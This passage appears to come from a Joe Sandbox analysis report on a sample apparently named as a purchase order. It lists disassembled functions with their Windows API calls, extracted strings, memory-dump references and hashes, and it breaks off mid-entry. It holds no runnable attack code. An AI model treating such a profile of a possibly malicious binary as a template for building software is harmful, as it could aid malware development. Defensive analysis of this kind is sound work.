                                                                                                              • API String ID: 136442275-0
                                                                                                              • Opcode ID: 83a916dd329ee899b4bf2b94c8e36fd26daae1cc99fe23a554906dbeee1e3067
                                                                                                              • Instruction ID: 3033e3741bb501d84beb2e18a622cd2c9da54d40b14dc61cc9e10cb54b8889e5
                                                                                                              • Opcode Fuzzy Hash: 83a916dd329ee899b4bf2b94c8e36fd26daae1cc99fe23a554906dbeee1e3067
                                                                                                              • Instruction Fuzzy Hash: BE414D7684512CAEDF65DB91DC41DDF73BCAF44300F4041A7B649B2091EA38ABE48B58
                                                                                                              Function 0042D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CharLowerBuffW.USER32(0047DC00,0047DC00,0047DC00), ref: 0042D7CE
                                                                                                              • GetDriveTypeW.KERNEL32(?,00493A70,00000061), ref: 0042D898
                                                                                                              • _wcscpy.LIBCMT ref: 0042D8C2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                              • API String ID: 2820617543-1000479233
                                                                                                              • Opcode ID: 6df48454bb6d74cca7c274c1b502cb9a04a811dc468b623742ea38a76bda00af
                                                                                                              • Instruction ID: bf9d0385ddb8d0ee198011b49bffe72b7d076fde5fcb189d21e436c50f38af9e
                                                                                                              • Opcode Fuzzy Hash: 6df48454bb6d74cca7c274c1b502cb9a04a811dc468b623742ea38a76bda00af
                                                                                                              • Instruction Fuzzy Hash: BD5107316043549FC701EF14E881AAFB7A5EF84314F60892EF5AA5B2E2DB35DD05CB46
                                                                                                              Function 003E936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __swprintf.LIBCMT ref: 003E93AB
                                                                                                              • __itow.LIBCMT ref: 003E93DF
                                                                                                                • Part of subcall function 00401557: _xtow@16.LIBCMT ref: 00401578
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __itow__swprintf_xtow@16
                                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                                              • API String ID: 1502193981-2263619337
                                                                                                              • Opcode ID: be60c7c8076bff95df13c6434f8af44387a3caaf5a3a0876201351e56f756b0d
                                                                                                              • Instruction ID: 093ae1d824083c9c41113e01c4f65a1027b323ac93282dbed3dfccec2a170667
                                                                                                              • Opcode Fuzzy Hash: be60c7c8076bff95df13c6434f8af44387a3caaf5a3a0876201351e56f756b0d
                                                                                                              • Instruction Fuzzy Hash: FB411775500214AFDB26EF75D941F7AB3E8EF84304F2045AFE949DB2C2EA359941CB14
                                                                                                              Function 0044A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0044A259
                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0044A260
                                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0044A273
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0044A27B
                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A286
                                                                                                              • DeleteDC.GDI32(00000000), ref: 0044A28F
                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0044A299
                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0044A2AD
                                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0044A2B9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                              • String ID: static
                                                                                                              • API String ID: 2559357485-2160076837
                                                                                                              • Opcode ID: a0f906b944f95d5d03a11c31ca97e6beb64d69202fb925b88d21fd13bda1b0e1
                                                                                                              • Instruction ID: 72fc64bb7466badc73bfb2d99e2767b5b7221aa0030a281c4cf70660d5982236
                                                                                                              • Opcode Fuzzy Hash: a0f906b944f95d5d03a11c31ca97e6beb64d69202fb925b88d21fd13bda1b0e1
                                                                                                              • Instruction Fuzzy Hash: 3E31D231A00114ABEF115FA4DC09FDB3B68FF0D360F100225FA15A22A0D7B5D821DB69
                                                                                                              Function 00426F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                              • String ID: 0.0.0.0
                                                                                                              • API String ID: 2620052-3771769585
                                                                                                              • Opcode ID: 600f13c0eaa6684e1623885991c92d3d6b7205f060237d9522ac8083afdfa473
                                                                                                              • Instruction ID: 5036078bc1fcc409d0397ec2714a716afef85bfc0801a8a7da08b8722b7d0196
                                                                                                              • Opcode Fuzzy Hash: 600f13c0eaa6684e1623885991c92d3d6b7205f060237d9522ac8083afdfa473
                                                                                                              • Instruction Fuzzy Hash: 57112771E04124AFDF14AB71BD49EDA77ACDF00715F02007BF105A6080FFB89A81866A
                                                                                                              Function 0040500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00405047
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              • __gmtime64_s.LIBCMT ref: 004050E0
                                                                                                              • __gmtime64_s.LIBCMT ref: 00405116
                                                                                                              • __gmtime64_s.LIBCMT ref: 00405133
                                                                                                              • __allrem.LIBCMT ref: 00405189
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004051A5
                                                                                                              • __allrem.LIBCMT ref: 004051BC
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004051DA
                                                                                                              • __allrem.LIBCMT ref: 004051F1
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040520F
                                                                                                              • __invoke_watson.LIBCMT ref: 00405280
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 384356119-0
                                                                                                              • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                              • Instruction ID: e76e3ddcfdcfc81dc61db04f531464f5ed7de96c29df4a44a2b7c143129bdc75
                                                                                                              • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                              • Instruction Fuzzy Hash: 6571A471A01B16ABD714AA79CC41B9B73A9EF00768F14423FE510EA2C1E778D9408FD9
                                                                                                              Function 00424DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00424DF8
                                                                                                              • GetMenuItemInfoW.USER32(004A1708,000000FF,00000000,00000030), ref: 00424E59
                                                                                                              • SetMenuItemInfoW.USER32(004A1708,00000004,00000000,00000030), ref: 00424E8F
                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00424EA1
                                                                                                              • GetMenuItemCount.USER32(?), ref: 00424EE5
                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00424F01
                                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00424F2B
                                                                                                              • GetMenuItemID.USER32(?,?), ref: 00424F70
                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00424FB6
                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00424FCA
                                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00424FEB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4176008265-0
                                                                                                              • Opcode ID: 811d2c55f6e273e198f65b95e81e91e29d2d3625afc8352f188dfbc35b2c7576
                                                                                                              • Instruction ID: 578824054413e5b9722bd449152337f3623ae33454ebb53a880ced851350714b
                                                                                                              • Opcode Fuzzy Hash: 811d2c55f6e273e198f65b95e81e91e29d2d3625afc8352f188dfbc35b2c7576
                                                                                                              • Instruction Fuzzy Hash: 1D61B471B00269EFDB11CF64E984EAF7BB8FB85308F55005AF402A7291E7749D05CB29
                                                                                                              Function 00449C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00449C98
                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00449C9B
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00449CBF
                                                                                                              • _memset.LIBCMT ref: 00449CD0
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00449CE2
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00449D5A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$LongWindow_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 830647256-0
                                                                                                              • Opcode ID: 7cdf4c1c9e88c3971c8d55bd10f93f9af59bbb1b937a093eee22ec54c10b06de
                                                                                                              • Instruction ID: e5363c0ebe5cbcf71fde32ebdeb700a263aa30f8d10989936220ae8216c41919
                                                                                                              • Opcode Fuzzy Hash: 7cdf4c1c9e88c3971c8d55bd10f93f9af59bbb1b937a093eee22ec54c10b06de
                                                                                                              • Instruction Fuzzy Hash: 35616EB5900208AFEB21DFA4CC81EEE77B8EF09714F14416AFA05E72A1D774AD42DB54
                                                                                                              Function 004194E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004194FE
                                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00419549
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0041955B
                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0041957B
                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 004195BE
                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004195D2
                                                                                                              • VariantClear.OLEAUT32(?), ref: 004195E7
                                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 004195F4
                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004195FD
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0041960F
                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0041961A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                              • String ID:
                                                                                                              • API String ID: 2706829360-0
                                                                                                              • Opcode ID: 2cac183f21d6688a78bb1c42696b33b57ede5664084da60cf3b9a1f09aa57fb0
                                                                                                              • Instruction ID: d7c978d2248d4c1ab81b40d2fb9ffa7ffeb72b4e400e35c945f31cf36fe9d754
                                                                                                              • Opcode Fuzzy Hash: 2cac183f21d6688a78bb1c42696b33b57ede5664084da60cf3b9a1f09aa57fb0
                                                                                                              • Instruction Fuzzy Hash: 63414F31E00219AFCB01DFA4DC549EEBB79FF08354F008066E502A7261EB74EE85CBA5
                                                                                                              Function 0043BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearInit$_memset
                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?I$|?I
                                                                                                              • API String ID: 2862541840-463563548
                                                                                                              • Opcode ID: 05d34f1204ff9c5de54ca167754029feb91f7dd1409dedfa840cefd124c9b94f
                                                                                                              • Instruction ID: 6122c226e83ff200fa64489b5c357922bdc261926081098f7d9cd1690ba01bdb
                                                                                                              • Opcode Fuzzy Hash: 05d34f1204ff9c5de54ca167754029feb91f7dd1409dedfa840cefd124c9b94f
                                                                                                              • Instruction Fuzzy Hash: 8891A271E00219ABDF20CF95C844FAFBBB8EF49714F10915EF615AB280DB789941CBA4
                                                                                                              Function 0043ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • CoInitialize.OLE32 ref: 0043ADF6
                                                                                                              • CoUninitialize.OLE32 ref: 0043AE01
                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0046D8FC,?), ref: 0043AE61
                                                                                                              • IIDFromString.OLE32(?,?), ref: 0043AED4
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0043AF6E
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0043AFCF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                              • API String ID: 834269672-1287834457
                                                                                                              • Opcode ID: 2c3c398cf9f0363e7af8d8284057f85f70e159eb536f319190f60acc2a5f84e3
                                                                                                              • Instruction ID: aa0723f441fc411101b1007878f03898fa07d24f5cd48b628985c1f4827d241b
                                                                                                              • Opcode Fuzzy Hash: 2c3c398cf9f0363e7af8d8284057f85f70e159eb536f319190f60acc2a5f84e3
                                                                                                              • Instruction Fuzzy Hash: 0C61CA70648311AFC711EF54C849B6BBBE8AF88704F10051EF9859B291C778ED49CB9B
                                                                                                              Function 00438107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00438168
                                                                                                              • inet_addr.WSOCK32(?,?,?), ref: 004381AD
                                                                                                              • gethostbyname.WSOCK32(?), ref: 004381B9
                                                                                                              • IcmpCreateFile.IPHLPAPI ref: 004381C7
                                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00438237
                                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0043824D
                                                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004382C2
                                                                                                              • WSACleanup.WSOCK32 ref: 004382C8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                              • String ID: Ping
                                                                                                              • API String ID: 1028309954-2246546115
                                                                                                              • Opcode ID: e381d8c11108f8047fd0ec399e5c901f8cbb96be6fb54b834e1ac80a7836b219
                                                                                                              • Instruction ID: 35d5c6db663ce03b14d5ee05fbe33567e3c423bd194bbbcc9e0f8a70ab23b21e
                                                                                                              • Opcode Fuzzy Hash: e381d8c11108f8047fd0ec399e5c901f8cbb96be6fb54b834e1ac80a7836b219
                                                                                                              • Instruction Fuzzy Hash: BE518E31A047009FDB219F25DC45B6BBBE4AF48310F04896EFA55DB2E1DB78E901CB4A
                                                                                                              Function 0042E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0042E396
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0042E40C
                                                                                                              • GetLastError.KERNEL32 ref: 0042E416
                                                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0042E483
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                              • API String ID: 4194297153-14809454
                                                                                                              • Opcode ID: 6546f08510a004205b215da2cb9fb7726521ca53aa64a57b9a7ef358393ce1a2
                                                                                                              • Instruction ID: dc0fbe1869d3c05ac75e38a262c36182428cec56a7933a75047c5e76f534cae0
                                                                                                              • Opcode Fuzzy Hash: 6546f08510a004205b215da2cb9fb7726521ca53aa64a57b9a7ef358393ce1a2
                                                                                                              • Instruction Fuzzy Hash: 5331B435B002199FCB01EF65EC45FAE7BB4EF49304F548027E505EB291DB78AA02CB55
                                                                                                              Function 0041B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0041B98C
                                                                                                              • GetDlgCtrlID.USER32 ref: 0041B997
                                                                                                              • GetParent.USER32 ref: 0041B9B3
                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0041B9B6
                                                                                                              • GetDlgCtrlID.USER32(?), ref: 0041B9BF
                                                                                                              • GetParent.USER32(?), ref: 0041B9DB
                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0041B9DE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$CtrlParent
                                                                                                              • String ID: ComboBox$ListBox
                                                                                                              • API String ID: 1383977212-1403004172
                                                                                                              • Opcode ID: 083cf33a3a6ea93cc6a369d3287f6628038f2aec8942be55ed01ecb1d93834c4
                                                                                                              • Instruction ID: b5734f57bbfe11165bf899732aedb50ed6487f7ef66ec26a9372f0e9bf05859e
